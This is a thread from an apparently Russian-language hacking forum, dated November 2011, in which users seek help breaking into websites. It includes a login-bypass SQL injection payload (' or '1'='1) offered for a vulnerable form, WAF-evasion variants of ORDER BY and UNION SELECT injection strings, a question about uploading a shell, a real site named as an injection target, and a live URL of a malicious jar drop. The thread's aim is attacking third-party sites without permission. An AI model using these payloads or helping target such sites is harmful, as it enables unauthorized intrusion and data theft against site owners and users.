 |
|

13.11.2011, 16:54
|
|
Познающий
Регистрация: 27.01.2008
Сообщений: 57
С нами:
9625938
Репутация:
32
|
|
Сообщение от Gorev
и не получится..прав то нет у юзверя бд на запись...
шелл залить есть возможность ,но по другому
Отпиши пожалуйста как
|
|
|

13.11.2011, 17:42
|
|
Участник форума
Регистрация: 02.04.2006
Сообщений: 273
С нами:
10582516
Репутация:
114
|
|
Нашел Xss в input.
Фильтруется
[/CODE]
|
|
|

13.11.2011, 18:49
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами:
8417113
Репутация:
0
|
|
Сообщение от EST a1ien
EST a1ien said:
Нашел Xss в input.
Фильтруется
[/CODE]
|
|
|

14.11.2011, 13:24
|
|
Новичок
Регистрация: 05.10.2011
Сообщений: 1
С нами:
7686326
Репутация:
0
|
|
Добрый день.
Есть логин-форма.
При подстановке кавычки в любое из полей выдается:
MySQL-Error блаблабла
SQL Query:
SELECT user_id FROM users WHERE (BINARY _user_name = BINARY 'логин') AND (BINARY password = BINARY 'пасс')
логин и пасс - то что вводится в соответствующие поля, со всеми скобками, кавычками и пр., т.е. все спецсимволы в запросе не обрабатываются, а пролетают как текст.
Ну если ввести в оба поля admin' or 1=1 -- то на выходе и будет
SQL Query:
SELECT user_id FROM users WHERE (BINARY user_name = BINARY 'admin' or 1=1 --') AND (BINARY password = BINARY 'admin' or 1=1 --')
если кавычку заменить на %27, то SQL-ошибка не появляется, просто ответ "неверный пароль".
Как тут можно в эту BINARY инжектнуться?
|
|
|

14.11.2011, 15:13
|
|
Новичок
Регистрация: 03.02.2011
Сообщений: 1
С нами:
8037686
Репутация:
0
|
|
Всем доброго дня, взломали один сайт, поместили в него фрейм с ссылкой на это место - http://nncc.1dumb.com/main.php?page=5f7bf430541a94ae
я так понимаю загружается jar с инструкциями к исполнению и алгоритмом расшифровки контента, далее создается файл и что то выполняет, так как jar файл без какой либо подписи он ни исполняется. У меня вопрос, если бы он исполнился все же что бы произошло?
|
|
|

14.11.2011, 15:34
|
|
Новичок
Регистрация: 28.09.2011
Сообщений: 15
С нами:
7696406
Репутация:
0
|
|
Всем добрый день.
Помогите пожалуйста, вроде бы инъекция есть, а раскрутить не могу...
http://powerdefence.ru/Uslugi_dlya_Yur_lic'
|
|
|

14.11.2011, 18:19
|
|
Новичок
Регистрация: 03.05.2009
Сообщений: 7
С нами:
8960082
Репутация:
-14
|
|
Как обойти фаервол / фильтр при проведение SQL-инъекции?
Запросы вида: =-1'+order+by+10+--+
=-1'/*--*/order/*--*/by/*--*/10--
=-1'+OrDer+By+10+--+
При всех этих запросах пишет: Соединение было сброшено
|
|
|

14.11.2011, 20:37
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
С нами:
9384053
Репутация:
303
|
|
2 s000r: Нет тут sql injection (http://powerdefence.ru/Uslugi_dlya_Yur_lic')
2 aydin-ka:
=-1'/**//*!order*//**//*!by*//**/10--+
Так пробовал? Все зависит от того, где именно происходит фильтрация.
|
|
|

14.11.2011, 23:15
|
|
Участник форума
Регистрация: 05.09.2010
Сообщений: 147
С нами:
8255126
Репутация:
78
|
|
Сообщение от aydin-ka
Как обойти фаервол / фильтр при проведение SQL-инъекции?
Запросы вида: =-1'+order+by+10+--+
=-1'/*--*/order/*--*/by/*--*/10--
=-1'+OrDer+By+10+--+
При всех этих запросах пишет: Соединение было сброшено
Пробуй GROUP BY
или тупо
UNION SELECT 1 --
UNION SELECT 1,2 --
UNION SELECT 1,2,3 --
UNION SELECT 1,2,3,......,N --
Сообщение от Shimon
Добрый день.
Есть логин-форма.
При подстановке кавычки в любое из полей выдается:
MySQL-Error блаблабла
SQL Query:
SELECT user_id FROM users WHERE (BINARY _user_name = BINARY 'логин') AND (BINARY password = BINARY 'пасс')
логин
и
пасс
- то что вводится в соответствующие поля, со всеми скобками, кавычками и пр., т.е. все спецсимволы в запросе не обрабатываются, а пролетают как текст.
Ну если ввести в оба поля
admin' or 1=1 --
то на выходе и будет
SQL Query:
SELECT user_id FROM users WHERE (BINARY user_name = BINARY 'admin' or 1=1 --') AND (BINARY password = BINARY 'admin' or 1=1 --')
если кавычку заменить на %27, то SQL-ошибка не появляется, просто ответ "неверный пароль".
Как тут можно в эту BINARY инжектнуться?
В оба поля: ' or '1'='1
|
|
|

14.11.2011, 23:35
|
|
Постоянный
Регистрация: 17.04.2011
Сообщений: 638
С нами:
7932566
Репутация:
81
|
|
Сообщение от aydin-ka
Как обойти фаервол / фильтр при проведение SQL-инъекции?
Запросы вида: =-1'+order+by+10+--+
=-1'/*--*/order/*--*/by/*--*/10--
=-1'+OrDer+By+10+--+
При всех этих запросах пишет: Соединение было сброшено
|
|
|
|
 |
|
|
Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
|
|
|
|